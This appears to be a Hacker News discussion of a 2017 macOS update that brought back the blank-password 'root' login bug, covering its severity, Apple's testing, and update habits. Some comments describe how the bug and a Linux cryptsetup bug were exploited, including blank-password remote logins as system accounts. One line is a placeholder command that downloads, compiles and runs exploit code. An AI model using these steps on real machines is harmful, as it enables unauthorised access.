MacOS Update Accidentally Undoes Apple's “root” Bug Patch (wired.com)
426 points by platinumrad on Dec 1, 2017 | hide | past | favorite | 162 comments



I feel weird reading comments here ranging from excusing the developer to blaming him, for its lack of unit testing or anything. Let’s make this clear: management fcked up badly. Human process. Not code, not unit testing, not a single line of code is responsible. And you know why? Because when you’ve had the greatest security failure in a decade publicly shaming your company and your team, you personally make sure it doesn’t happen again in the next release.

And it’s not just one manager. The whole management is screwed, it’s a disaster. I think now is really time to say: would you imagine this happening under Steve Jobs?


> Because when you’ve had the greatest security failure in a decade

It's nowhere close to the greatest security failure in a decade. It's not even a contender in the far off distance. It's a well publicized vulnerability, and it's quite silly, but in the scheme of things it's just a Tuesday for CVE writers. We even had a vulnerability functionally identical to this, and similar in both severity and silliness, hit Linux within the past year.

If you're talking about Apple specifically, it's still not that bad. The vulnerability couldn't be arbitrarily executed remotely with default OS settings, and it didn't grant kernel access. The Trident flaws were significantly worse than this, and that's just the first that comes to mind.

Yes, yes, I know this wasn't the thrust of your point...but still. People get kind of hyperbolic when it comes to rating security vulnerabilities. It's more silly than it is severe. I expect at least one vulnerability of comparable impact on every major point release of every major operating system and web browser (not that this is a good thing, but it's logistically realistic). I don't think this is particularly bad for Apple's public image or reputation. Headlines about "the sky is falling!" vulnerabilities make the rounds every so often; for better or worse, it never really seems to stick in public consciousness.


Because it doesn’t provide remote access, you’re right. But it’s been released publicly before there was a patch available, on an OS that’s only used as a personal computer, not as a server. And it is immediately exploitable by just anyone, with 0 technical background. I think that makes it a very big deal, no matter what scale CVEs usually use. I also don’t remember any macOS security breach getting that much publicity.


I agree it's a big deal, in that it's serious - it's a security vulnerability after all, yes. But I disagree about its significance for Apple in the face of the sheer number of security advisories that come out across iOS and macOS each year. When we broaden perspective away from just Apple, this becomes absolutely minuscule. There's a lot of navel gazing going on, but there's not a lot of reason to read anything particular out of this at all.

It's very silly, and I would also be embarrassed if I was involved in it, but those aren't good metrics for judging the realistic frequency of bugs like this, nor their severity. I've had vulnerabilities I've reported picked up by a bunch of news media before even though they weren't that serious. As it turns out, the media just latches on to security headlines, and everyone sort of forgets about it except us grumblers on Hacker News, because we Never Forget.

Someone from Google Project Zero has probably been inspired to start fuzzing the macOS at the UI level now, and that's a good thing - they should. But that's about all I'm taking away from this story.

Moreover:

> on an OS that’s only used as a personal computer, not as a server

This makes it less severe, not more so. I'd rather have a Heartbleed impacting nearly every server on the internet than a...whatever we're calling this, impacting every macOS computer in the world. I guess I can make a botnet...except I still have to be local to it in the majority of cases, or do specific targeting, or chain this with another piece of popular, compromised software, etc. It suddenly becomes a bit more complex than just someone pressing enter on a root prompt twice. Plus, if the vulnerability is laughably silly, it's usually easier to find than a chain of them that evidences a systemic misconfiguration in the entire OS.

In fact, I'd posit that the reason this story is getting so much attention is precisely because the vulnerability is so easy to understand, and because someone disclosed it on Twitter. Frankly, the whole situation is really quite funny in a black comedy sort of way. But while it's fun to write stories poking fun at large companies for their silly mistakes, it doesn't meaningfully reflect their security competency or the long term perception of their security competency.

Really I don't mean to trivialize it. It's not a good look, and definitely it's worthy of being patched. But I think it's worth looking at from a much broader perspective.


>> on an OS that’s only used as a personal computer, not as a server

> This makes it less severe, not more so.

You are looking at it from the perspective of a seasoned security professional. It's like looking at the terrorist attack in Nice from a military point of view and saying "eh, this was just a guy on a lorry; it's much more difficult to raid Osama in the middle of Pakistan". That might well be, but this does not matter to the general public - to them, concepts like "botnets" are immaterial, whereas Slippin' Jimmy entering their macbooks to read their emails while they're sleeping is very real.

In that sense, the impact here was bigger than any other security hole ever experienced on the Mac.


I don't really think your analogy is all that apt, but anyway, it just serves to reinforce dsacco's point: there may have been a lot of fuss over this, but in terms of actual impact, this was negligible.


> I'd rather have a Heartbleed impacting nearly every server on the internet than a...whatever we're calling this, impacting every macOS computer in the world.

I think I must be misunderstanding this, or else the rest of your comment. Did you really mean it this way (more Heartbleeds is better than more personal-OS vulnerabilities), rather than the other way around?


> because it doesn’t provide remote access

It was, via Screen Sharing and a few other remote mechanisms.

It "likely" wasn't often internet accessible due to firewalls, but it was remotely exploitable on many large Mac deployments in enterprise and education.


You'd still need physical access to a logged-in machine to exploit it. I'm not sure what the latest default is as to Guest accounts and whether or not those can exploit it, but it's a significantly different story if it requires you to exploit it on an unattended logged in machine.

If guest accounts are enabled by default and a guest account can exploit it, yeah... that's pretty bad.


> You'd still need physical access to a logged-in machine to exploit it

Not necessarily; this aspect was unfortunately underreported:

"macos 10.13 bug isn't limited to root in all circumstances; via ARD, you can log in as any existing user (e.g. _applepay) and share the screen of the logged-in user. also _uucp is allowed to log in"

https://twitter.com/unsynchronized/status/935656609140711426


The defaults don't allow for remote management, screen sharing, or SSH or anything. Most of these devices are going to be sold without those options ever being touched.

So that limits things in terms of who is affected.


Just as a very simple, isolated example, think of all the Mac Mini servers with Remote Management enabled at https://macminicolo.net .

As I mentioned below, this remote exploit did NOT require ever logging in as root, whether with or without a password. This was a much more serious bug than is commonly understood.


None of which makes this statement any less inaccurate:

> You'd still need physical access to a logged-in machine to exploit it.


> None of which makes this statement any less inaccurate:

>> You'd still need physical access to a logged-in machine to exploit it.

Yes it does; if Remote Management was enabled (as is often the case for remote servers or mass deployments), an attacker could log in via Apple Remote Desktop using default, pre-existing user accounts (_applepay, _uucp, etc) and a blank password without ever needing physical access.

Just tested again with a new, unpatched install of 10.13.1 on one Mac, connecting via Screen Sharing from another. To be clear, I never logged in as root on the 10.13.1 Mac at all, even via the exploit.


You are agreeing with the comment you're replying to. He/she was saying that the defaults being what they are do not make the statement that you need physical access any less inaccurate.


Thank you for the kind correction and clarification, 59nadir. And my apologies to you, Someone1234, for having hastily misread your comment.


> You'd still need physical access to a logged-in machine to exploit it.

You don't. You can exploit it from the login screen after a machine wakes from sleep, you can also exploit it remotely via Screen Sharing.


But from a shut-off machine it wasn't exploitable? Have an iMac sitting at work (turned off) and am on vacation =)


I'm not necessarily doubting, but what is the Linux vulnerability you're referring to?


Maybe this[1] one? Hit enter 30 times to get a root initramfs on encrypted, Debian based distros.

My laptop was vulnerable to this one for quite a while. [1] http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetu...


Which is really not a bad vulnerability as the data is still encrypted. Physical access means root anyway.



That bug required root to exploit, not really the same severity.


Might be worth hitting enter a few times - it’s worked before.


> It's more silly than it is severe

So, being able to install spying software on any Mac OS X is something silly for you?

Let's say I just don't agree.


That's because the public doesn't care about security.

How many people read patch notes or are aware what security patch their Android has?


> would you imagine this happening under steve jobs?

Of course it could have. Making software is hard, and mistakes get made. The idea that the magical presence of Steve would prevent this is absurd.

There were plenty of terrible MacOS bugs under Steve's reign too. I can't help but feel there is perhaps a new generation of Mac users who don't remember or didn't experience how painful OS X was at times, even many years after the OS 9 to X transition had started.


Not magical. Fucking terrifying, and uninterested in the management layers designed to insulate any level staff from the consequences of this mistake. Compare Rickover.


It’s true.

OS X versions 1-3 were pretty bad. 10.3 was the first to be usable. 10.4 was actually good. Then 10.5 Leopard (or Leper as we knew it) was awful on release. From Snow Leopard onwards it’s been much better, with the occasional howler of course.

It seems to be a constant refrain that Apple’s software quality is declining in the same way civilisation is always falling or HN is becoming more like reddit.

In High Sierra they painlessly replaced the filesystem. Quite an achievement. Although everyone involved in this latest problem should be highly embarrassed.


> In High Sierra they painlessly replaced the filesystem.

Except that a colleague of mine who was adventurous enough to try it lost all the data. That stopped any of us from upgrading (fortunately, if I may say so).

(it might be due to encryption, but it doesn't matter - the "painless" part is clearly not for everybody)


> In High Sierra they painlessly replaced the filesystem.

No, they did not. They still cannot upgrade any Mac mini server running RAID 1. They sold that configuration and crippled their software to put in the new file system. That is only painless for flash drive owners.


So what pain did it cause you? Your computer is running the new OS, and they’re doing a staged rollout which seems to have caused no problems – that sounds exactly as described.


My computer is not running the new OS since it cannot be upgraded currently. We are upgrading every other Mac (originally for fear of not having the latest security), but cannot do upgrades on a configuration sold by Apple. Their filesystem transition, which was accompanied by a downgrade of Disk Utility, is not painless.


> It seems to be a constant refrain that Apple’s software quality is declining

Funny - until recent years, I remember the mantra on MacOS being "yeah, but it's gotten better in the latest release".


I agree that management fucked up to allow this to happen again. But saying it's purely management's fault is another extreme.

In big companies there are layers of 'management', including down to dev leads and tech/virtual leads who are devs by title. Knowledge of codebase/systems/deployment increases as you get down to the leaves. There are architects, release managers, product managers, etc. that should have provided multiple checks/balances. It's easy to point at "management" in big companies just as it is easy to point at "developers". But there's a whole bunch of nuances in the middle.


> There are architects, release managers, product managers, etc. that should have provided multiple checks/balances. So to say it's purely "management" isn't quite correct to me.

The fact that all the architects, release managers, and product managers that you mentioned do not function as a coherent structure capable of eliminating the occurrence of critical defects is the definition of management failure. NASA also had plenty of architects and directors when Challenger exploded. Such catastrophic failures, especially on repeat, are indicative of systemic dysfunction. That is always the fault of top management.


It didn't happen again in the /next release/, it happened when upgrading from an older release to the current one.


Seriously. It’s shitty, but rebooting isn’t the end of the world. The problem is they don’t force a reboot with the fix. Now they just need to roll a new 10.13.1 with the fix and force a reboot with the standalone patch, problem solved.


What do you mean when you say management fucked up: they don't think it's worth investing in the quality of Apple software? This is a decision, not a fuck up.


> This is a decision, not a fuck up.

Can't it be both? I feel like when people talk like this, it abstracts away from the concept of a bad decision. Everything's a tradeoff! Sounds great until you hit actual consequences.


It probably was this great idea of merging the iOS and MacOS teams. That just screams management.


This doesn't even come close to being the greatest security failure in the decade. Equifax and Intel ME are both much worse.


In case that wasn’t clear, I’m talking about Apple.


He didn't say Apple though. I thought he meant in general. I was apparently wrong. In which case this is probably right.


Those have nothing to do with Apple. They are massive failures from other companies.


I've been struggling for a long time to convince some of my less technical friends that keeping all of the software on their devices up to date is an important best practice from a security perspective. I'm afraid that the recent muck ups in High Sierra and iOS 11 are going to make sure that some of them never listen to me ever again.


I have a hard time believing that your less technical friends are even following Apple news. The average person that walks into an Apple store and buys a Mac probably has no idea about the original vulnerability, let alone the multiple patches for it.


The average person that updated their iOS to 11 during the first two weeks has definitely noticed how bug-ridden it is with power issues, 3D touch issues, and the autocorrect bug.

We've trained people to update ASAP for security reasons, but when Apple drops the ball and seriously fucks up iOS 11 for a month until 11.1.1 was released, this will keep users update-shy.

I hope 2018 emphasises rock-solid releases for both macOS & iOS. Or Apple should move to a two-year release cycle (wishful thinking).


There is still an unfixed iOS 11-introduced bug [1] that kills the notification screen and requires a power cycle to fix. Some users hit it multiple times a day.

[1] https://discussions.apple.com/message/32638979?ac_cid=tw1234...


You don't need to be following "Apple news" to hear about this. It has been all over the news.


Indeed. You never need to follow Apple news to get Apple news, Apple is perhaps the one company that all MSM loves to talk about.

And I attribute that to themselves being largely Apple users by force of habit.


Maybe they won't be aware of this particular vulnerability but issues like the iOS autocorrect bugs[1][2] get memed to death on all sorts of mainstream social media platforms. Even the original "root" tweet got 10k+ retweets.

[1] https://www.theverge.com/2017/11/6/16611756/ios-11-bug-lette... [2] http://bgr.com/2017/11/27/ios-11-problems-keyboard-autocorre...


Sure but that's still a far cry from saying that even a significant percentage of the Mac user base is aware of it. Social media moves so fast that there's almost no chance it penetrated the zeitgeist. A big well known flaw was the iOS 8.0.1 update that bricked iPhones. That was pulled within a few hours of it being released but the scale of the iPhone meant that it impacted a large number of people. This is too invisible for anyone to notice.


I hear you, and I have the same problem (hi, Dad) but it is worth noting that this latest re-occurrence of the bug happens only to machines that were not up-to-date when they downloaded (or rather, when Apple remotely installed) the security patch.

If a machine had 10.13.1 (the latest version of macOS) installed when that happened, it is OK.

If the machine had 10.13.0 installed when Apple installed the patch, however, then the update to 10.13.1 will bring the bug back, and necessitate both re-installation of the security patch and a reboot before the machine is again safe from the "root access for anybody who can spell 'root'" bug.


Unfortunately, this is probably not going to convince non-stop technical people who already are hesitant to listen to sound advice about updating; at least the people like this who I know will just hear "the update broke things" and take that as confirmation of what they already believed.


I never upgrade immediately. Still on Sierra. I need my machine for work. I can't justify being an Apple beta testing guinea-pig. Once I know it's stable and/or all the major problems that could affect me are at least known if not fixed then I will upgrade. Anything else is reckless. Nothing wrong with applying security patches on the old OS as needed.


One problem is that Apple did NOT release a security update for older systems along with 10.12.0 and 10.13.0. Only when 10.12.1 and 10.13.1 came out did they publish patches for earlier revisions. That gives everyone a choice between using a .0 release (ouch) and running an unpatched OS for about a month.


I'm never that far behind with my strategy. After a while you get diminishing returns by not upgrading.


Sorry, I think my post was not very clear.

macOS High Sierra 10.13.0 was released on 2017-09-25. Sierra (10.12) and El Capitan (10.11) were not patched on that day. So if you didn't upgrade to 10.13.0 _on the first day of its availability_, you were missing out on these security fixes: https://support.apple.com/de-de/HT208144

Apple only released patches for 10.12 and 10.11 along with 10.13.1, more than a month later (2017-10-31): https://support.apple.com/de-de/HT208221

The same pattern happened when 10.12.0 was released - older systems only started receiving security fixes on the day 10.12.1 was released.

So it is generally true that Apple keeps the three most recent versions of macOS secure, but there's always this awkward gap around September where they don't.


So you would recommend staying no more than one annual release behind?


See my answer to the sibling post. I'm not sure what to recommend. When 10.14 comes out, we'll probably have to read the KB article to evaluate whether the security fixes are so important that we should install 10.14.0 immediately (no matter how buggy it may be).


This doesn't apply to iOS. If a new iOS version comes out, you should update immediately so you can test if it fits your comfort. If not, you have a very limited window to go back to the previous major (and hopefully still secure) version of iOS.

If you miss this window, you have two options - stay on the older version waiting till the new version gets all the annoying bugs fixed (hello iOS 11), or if you're already on the newer version, you're screwed - no coming back.

For this reason I started upgrading to newer iOS versions as soon as they are available.


I'm always up to date on iOS. I rarely use my iPad for programming related tasks.


And this is the real long lasting problem with Apple’s shoddy software quality of late. Nobody I know updates their software anymore because they don’t trust that the update won’t ruin something. I personally have always updated my software religiously but even I won’t do that on my iPhone anymore. And now the only option they have to close security vulnerabilities is to force updates...and when you force it, brand loyalty is gonna take a hit.


I always install security updates as soon as they are released but I do not and I advise my friends not to upgrade to the latest major release right when it's been released.

I still remember the update to El Capitan destroying my FileVault with all my files (luckily I had a backup). Recent major releases of OS X introduce regressions and are bug ridden for the first 6 months.


I generally stay 1 release behind (kept patched) for this reason, plus ensuring my workflow is not broken for a few months of the year.

The latest version isn't always the most stable or secure, either.

Someone had mentioned in a different post that Apple may not apply all security patches to Sierra. If I can find some support to this I think it will be picking the lesser of two evils.


I haven't checked Apple's "security content" KB articles recently, but I remember that the fix for this bug was not backported at the time:

https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-...


Judging by Apple's security updates page[1], they're still releasing standalone security updates for older versions of macOS. Unfortunately, the same is not true for iOS where security updates are rolled into OS updates.

[1] https://support.apple.com/en-us/HT201222


Apple used to release a security update for revision N-1 and N-2 every time the current release got a point upgrade. However, 10.12.0 and 10.13.0 were both released on their own. Only when 10.12.1 and 10.13.1 were released did older systems get patched.

So every time a new macOS release comes out, everyone has the choice between running a .0 release, or running an insecure OS for about a month.


Do you have any clue how to subscribe to security updates only on OS X? Looking for OS updates simply suggests downloading High Sierra, but my work laptop has to stay on El Capitan for dependency reasons.


It suggests downloading High Sierra because you've presumably already installed this update a month ago:

https://support.apple.com/de-de/HT208221

The App Store "Updates" list is the right place to look (and refresh).


Apparently not all patches are back-ported to older versions of MacOS.

Haven't had a chance to look into this further on how Sierra may be impacted.

https://news.ycombinator.com/item?id=15386319


I hear you! I have resorted to "wait for a month or two, and then update". Usually a few point updates are available by then. Explaining security to my family and friends doesn't work (most think password managers and autofill are a bigger security hole than using the same password everywhere).


>most think password managers and autofill are a bigger security hole than using the same password everywhere

Argh. My thanksgiving dinner in a nutshell.


Updates do two things. They repair old bugs, and they introduce new bugs, often called features. It would be great if you could subscribe to just the former, but the idea that it is uniformly better to update seems absurd to me.

From a user perspective, I never want my experience to change without my express consent. Sometimes I don't have the power to prevent it, but for my OS, I definitely have that power, and exercise it regularly.


As the memorable quote goes, "Updates are like vaccinations that have a large chance of making you grow an extra 3 ears, lose one eye, and turn your skin bright green."

Updates to fix specific and very important bugs are good. Updates that do more are not. Unfortunately, I have often pondered how to solve this problem, and come to the conclusion that it's not easy --- but perhaps if almost all the users take a stand and just do not update whenever it's not for the specific and sole purpose of fixing some important bug, even if it means leaving security behind, maybe companies will finally listen and stop making security an excuse to bundle in other unwanted changes; because then they'll know that any attempts to do so will be met with high resistance, and if their goal was to secure, they would only fix these security issues and leave everything else alone.

Although it's not Apple, the sentiment around Windows Vista and 8.x show that companies do care about their customers to some extent; but they're not going to care if the majority of users just slavishly accept whatever they get.


And they typically replace working systems that you're used to with broken systems with a lot of new eye candy thrown in for no other reason than to be more modern looking totally throwing off any kind of muscle memory and familiarity.


Best advice you can give to less technical friends is to just use a ChromeBook / Windows 10S device / or iPad.

General purpose computers are no longer necessary for a significant chunk of consumers.


> ChromeBook / Windows 10S device

"Hey sumitgt, how do I get $software to work? I bought it for $79 on sale but it won't open."

> iPad

"Hey sumitgt, can you help me get $university's site to work? I need to turn in my homework before midnight, but the page says something about Internet Explorer and Adobe Flash."


I guess that is the case in a lot of places. But things are changing and quickly as well. These devices are fashionable so adoption of them comes from edicts up top to IT.

Microsoft has been pushing the office online suite a lot in universities and businesses.

Also went to university a number of years ago and they used simple HTML file upload stuff for turnins of coursework.


iPad ⇆ iOS :(


I meant more as a replacement to laptops and desktop computers.


Generally I’ve noticed more bugs on High Sierra than on previous OSX releases. Things ranging from UI glitches to freezing safari to random slowdowns - all across multiple different machines.

Coupled with the security issues it’s clear that whoever is responsible for Q&A these days is asleep at the wheel.

It’s the reliability of the hardware and software that brought me to Apple back in the days of the G4.

Ironic that I may have to switch back to Windows since my work machine seems less buggy than my Mac!


Win 10 has its fair share of bugs, tbf. In fact Win 10 feels like a Google product that never leaves beta. There will always be glitches and weird stuff. Some things have become very good over several iterations. But there is a ton of new stuff they keep adding and all of it is half baked until the next big release.


The worst thing about Windows 10 is there’s a mandatory, automatic OS upgrade every few months, which Microsoft pretends is simply an update. This can and will break things every single time.


That's actually something I like. It makes most users' PCs much more secure. Also if absolutely required, OS upgrades can be deferred by up to a year.


I recently upgraded to High Sierra on my MacBook, and I had random reboot problems: https://discussions.apple.com/message/32649321

Downgrading to Sierra fixed it... I still don't know what was causing the reboots.


Incredibly my El Capitan -> High Sierra update went smoothly and fixed the abhorrent wifi problems I had had forever—however that was the only reason I wanted to upgrade. macOS has not been evolving for a while. I miss the Leopard days.

iOS 11 on the other hand was more of a downgrade to beta on my 7 Plus.


What WiFi problems would those be? I'm sitting on Sierra for now, but my laptop has been refusing to connect to a network automatically 95% of the time on wake. Now I'm wondering if it's worth braving High Sierra for a fix to it.


The connection would stay open but after a few minutes the ping would fail. I had even set up a WiFi reset script to get back to working 20 times a day. It did it only on some routers, even if I connected to them through my old AirPort Express.


Does it make a difference which brand of access point you're trying to connect to?


As serious as this is, it kind of makes me feel humbled in a way knowing I’ve been through these exact situations and it happens to Apple too.


That isn’t what humbled means.

> humble ˈhʌmb(ə)l verb past tense: humbled; past participle: humbled
>
> cause (someone) to feel less important or proud. "he was humbled by his many ordeals"
>
> decisively defeat (a sporting opponent previously thought to be superior). "Wales were humbled at Cardiff Arms Park by Romania"


Maybe they now feel less important or proud. Whatever the case, it's not up to you to police this commenter's thoughts. Why did you decide to take time and energy to post a dictionary definition in attempt to do so? This just feels almost completely patronizing.


>As serious as this is

... So, not at all? It’s an LPE for God's sake. EDIT: Apparently it affects remote desktop too, so not just an LPE.

Can this even be exploited from within the sandbox?


Not just local. VNC and other remote protocols are vulnerable.


Ah, that's far more interesting. Do you know if SSH is affected?


SSH is not affected.


LPE matters a lot for enterprise and educational customers.

What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.


>LPE matters a lot for enterprise and educational customers.

Surely not. In real life LPE bugs are far too common to matter a lot to anyone.

>What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.

I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.


>I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.

Oh, right. I tend to kind of forget that the App Store serves any other purpose than to deliver software updates as most of the applications on my Mac are from other sources. Yes, I agree that sandboxed apps are almost certainly prohibited from filling in login prompts by default. There does appear to be a system by which sandboxed apps can ask for additional permissions but I'm not an OS X/macOS application developer so I have no idea how this permissions system works.

>Surely not. In real life LPE bugs are far too common to matter a lot to anyone.

LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.


>LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.

Often enough a `wget http://xxx.xxx/xxx.c&&gcc xxx.c&&./a.out` will suffice. I'm not convinced that the ease of exploitation makes this bug particularly serious as an LPE.


LPEs are very serious for the countless college campuses, public libraries, and design print shops like Kinkos that offer public access to Mac computers.


Very serious or minor annoyance? "college campuses" don't strike me as the kind of places where any security issues are considered "very serious".


This LPE would allow anyone to install a kext rootkit on the machine. How is that not serious?


Why is that significantly more serious than them running any other backdoor as a normal user?

I don't understand the threat model here, it is always completely unreasonable to expect that an attacker wouldn't easily be able to escalate privileges locally in a multi-user system.


I'd imagine it makes device theft rather more serious.


Summary: the root bug reappears when you upgrade your Mac. You need to manually reinstall Apple's security patch and reboot. There's no warning that a reboot is necessary.


Huh, and how do I reinstall the patch? I can't find a download link, and the App Store doesn't let me do anything with the update.

Funny thing is that the steps in the `To confirm that your Mac has Security Update 2017-001` section of the update page confirm that I have the update, but I am still vulnerable to the issue.

Do I understand correctly that setting a root password is also a valid workaround for the issue?


Would a problem with something as fundamental as this happen with an open source UNIX-like distribution and fail to be discovered or adequately fixed?

Would anyone feel compelled to apologize for mentioning a mistake by an open source project on Twitter?

The gentleman who tweeted about Apple's mistake actually apologized for it on Medium. Crazy.

https://medium.com/@lemiorhan/the-story-behind-anyone-can-lo...

Apple can claim it is "certified" as UNIX(TM). And publish the source for userland code it copied from open source projects.

Microsoft is trying again to subsume "UNIX" into Windows, allowing users to run Linux binaries without running a Linux kernel.

But neither is a substitute for the original open source UNIX-like projects.

This blunder by Apple proves that even the wealthiest company on Earth does not necessarily produce better "UNIX" than a group of unpaid volunteers. At least if the user cares about the basics.


> The gentleman who tweeted about Apple's mistake actually apologized for it on Medium

I read his statement but I don't see an apology there. It's a reply to people who are saying he should've practiced responsible disclosure.


I am still confused. I was prompted again today to install the security update I installed yesterday. Did they silently release another improved security update?


Yeah, the day after they put out the initial update (17B1002), they put out a second update (17B1003) that fixed the file sharing issue caused by the first one.


Sounds like a typical extra-super-hyper-important-emergency effort under the constant gaze from the very top through the thick E/S/VP/etc. layers of CYA mediocrity, eager to report up the successful completion of a glorious effort to the glorious leader, in a typical BigCo where engineering culture is faltering while nobody who matters cares (or is even able to care). Well, at least it was that way back at Sun :) ... Or maybe it was just one bad day at Apple. Though many people like to argue that engineering culture is exactly what prevents the "bad" days from happening...


Yup. That paired with what appears to be the lack of a decent test process.

Maybe 2018 is the year of the Linux desktop? ... one can dream...


2017 and on is the year when you run Linux on the desktop, the Windows desktop it is.

My setup tips https://github.com/chx/chx.github.io/wiki/How-I-set-up-my-Wi...


Linux desktop user here, I'm pretty happy so far to end 2017.

https://i.imgur.com/yG3ep3M.jpg


Huh, they made GNOME look good, I'm mildly surprised to admit. Not bad.

I have to admit that for a second there I thought you were running Bash on Windows and the terminal was going through an X server. Ha


There are many Linux distros these days with graphical installers, that look great out of the box, etc.


Wow. Gnome has improved significantly (visually, that is) since I last looked.


Yeah, nice vista...


After I first faced GNOME 3 last year (our BigCo, like any other BigCo, likes SUSE, and that one isn't fast on bringing in new changes), I was wonderstruck at the engineering feat that it is (no joking, a great engineering achievement, just for a different world, and it took some effort to downgrade back to GNOME 2). Seeing GNOME 3 made me completely sure that the Linux desktop of our dreams just isn't coming.


Looks like someone screwed up their cherry-pick


It appears the problem is that the fixes included in the security update were not backported to 10.13.1, which caused a problem for users coming from 10.13.0 who had done the security update. Certainly a huge issue, but many commenters seem to misunderstand the article.


Everybody can have a bug. Even a bad one. In fact, virtually every system does have a doozy now and then. But recently with Apple it looks like they are serving them constantly. Shame for this to happen to the company that once could be pointed at as an example of somebody who gets how to make a professional Unix-based desktop.


This is turning into a comedy of errors. They don't add regression tests to their test suite? I'm a bit shocked that they're having so much trouble releasing a patch properly.


Wow, so now they have this massive security bug, screwed up file sharing when they fixed it, and now are apparently inadvertently rolling back the fix to the initial massive security bug.


Classic "rushing to fix a problem causes more problems" programmer error.


Now is better than never. Although never is often better than right now.


Prescription: additional sleep for security team, and non-negotiable vulnerability regression tests for all releases.


Seems to be a horrible week for Apple devs... I just got bit by this bug, which was infuriating as hell:

https://twitter.com/jeremybank/status/936775452097626113


With all the pressure to produce novelty gimmicks, it's a little unsurprising :/ and unfortunate; I'm a huge fan of OS X. It's nice to have a commercially supported Unix system that also has a decent UI.


Not a good week for Apple. They were doing pretty well reputation-wise when it concerned security so far, but this whole saga has been less than stellar. Amazing that regression testing didn't catch this.


There was no regression testing.


maybe there wasn't any regression testing...


Looks like Apple is having trouble hitting deadlines this year. iOS 11, Xcode 9, OS X all came out rushed. Maybe because they're moving to the new building. Or maybe they're trying to do too much stuff on a yearly release cycle now.


Not regretting my decision to always be one major release behind. At this point, I simply don’t trust Apple enough to install updates without breaking my system and interrupting my work.


For something as serious as the initial bug (especially given it was all over the press) there should have been regression tests for this.

Either deployment was broken, the tests were broken, there weren't tests, or multiple of the above :\ Anyway, I'm hypothesizing, but I would love to see a post-mortem on this. How does a generally reliable company like Apple screw this up twice?


Does Apple not require engineers to write regression tests? I really hope there is a blog post or press release explaining what happened.


lol, don't hold your breath.


Apple's security team is nailing this.



Cue obligatory 'this wouldn't have happened under Jobs' posts.


Well, it would only have happened once, that's for damned sure.


They’re playing Whac-a-mole.


Mac-a-mole


So my previous comment about how if Apple was smart they'd have a unit test for this seems to be confirmed. Apple is not smart. RIP.


It happens. Most people don't care anyway. They will continue buying and stock price will continue rising. ;)


Who remembers the System 7 Update 1.1.1?


I do.

Heck, I was responsible for the first crashing bug found in System 7.0. It was found about six hours after GM images were released to manufacturing. It was a crashing bug. It was remotely exploitable. It was one freakin' register, for cryin' in your cornflakes.


How was it remotely exploitable?


I’ve not seen this mentioned anywhere, but Apple installed the security update without my permission, which made me feel both sad and unsurprised that they effectively have back doors that can run code on my machine with impunity.

Will try for a Linux dev machine next time I think.


Apple pushes those who have not yet moved to Linux to do so?


The saga continues


One hesitates to comment on this sequence of events because it speaks for itself. But here is a stupid user opinion (mine):

I believe users place too much trust in corporations such as Apple, Google or Microsoft to protect them. There is too much debate over which company to choose ("I like ___________'s approach to security") instead of questioning whether delegating security to any of them is truly the wisest course of action.

I hope that this incident causes at least one user to question whether users might benefit from adopting a less trusting and more vigilant approach to protecting their data.

And by "vigilant" I do not mean "choosing the right tech companies to trust", diligently installing updates from these corporations and feeling self-satisfied.

I mean questioning the status quo and thinking seriously about the benefits of free, open source operating systems that are potentially reviewable by millions of developers and users. Systems that can be modified, compiled and installed easily by anyone, not only by small groups of people in corporations with special knowledge. Systems that can, e.g., permit and maybe encourage "safer", more conservative usage patterns.

Under the prevailing laws, I believe this pool of open source developers and users will always contain a larger number of people who care more about protecting user data than any groups within the above companies. It is a matter of self-interest.

Apple is a company with seemingly infinite resources at its disposal. But clearly in this case there were more people seriously interested in fixing this vulnerability outside of the company than within it. And as a dumb, naive user, I question anyone who would suggest that no one except a small group of people at Apple would be competent to do this work.

IMO, this mistake had nothing to do with what makes Apple valuable, namely their hardware. A UNIX-like OS running on Apple hardware does not need to be proprietary and, IMO, users have a compelling interest in software that can expose their data and pose other security issues being open.


I'm always a bit skeptical of this argument as a rationale for FOSS.

Of course, publishing your source code does make it a lot easier for outsiders to audit your software, but how many people actually do? Linux might be an exception because so many organizations build drivers and distributions for it (there are always people digging through the internals and likewise, hackers/security consultants looking for opportunities), but I suspect for most open source projects (even the big ones), there are way fewer people auditing them than comments like this would lead you to believe.

How many people do you think are digging through and critically analyzing Django/Node/Rails/Docker/OpenSSL/network drivers/etc? There's a mindblowing amount of code behind any application, and as developers/users, we tend to trust strength in numbers - people are using it, so it must be fine. But in practice, I wonder how much the bystander effect counteracts this intuition.


>publishing your source code does make it a lot easier for outsiders to audit your software, but how many people actually do?

I would say very, very few people in the world read random source code looking for bugs. Finding hidden bugs requires active use like a QA person would do. This has probably already been done on any major FOSS software, so any remaining bugs would be unbelievably hard to find, and very unlikely by just reading source code.

I mean it sounds good as a theory, but it also sounds like, "If I publish my book online for free, lots of people on the internet will read it."


You are both right. Having the code helps the kind of testing you’re talking about. Also static analysis.


>static analysis

Doesn't really change the equation though. That just allows people to not read it, faster, using automation. :)


Sorry I ninja edited above. I see your point upon reflection - we’re talking about other dimensions of open source (eg. popular and trusted), not the availability of the code.


“vigilant” spelling error; not too late to edit a great comment.


Oh! Well that solves the mystery of how Apple allowed their new USB-C MBPs to be so buggy in trivial use cases.

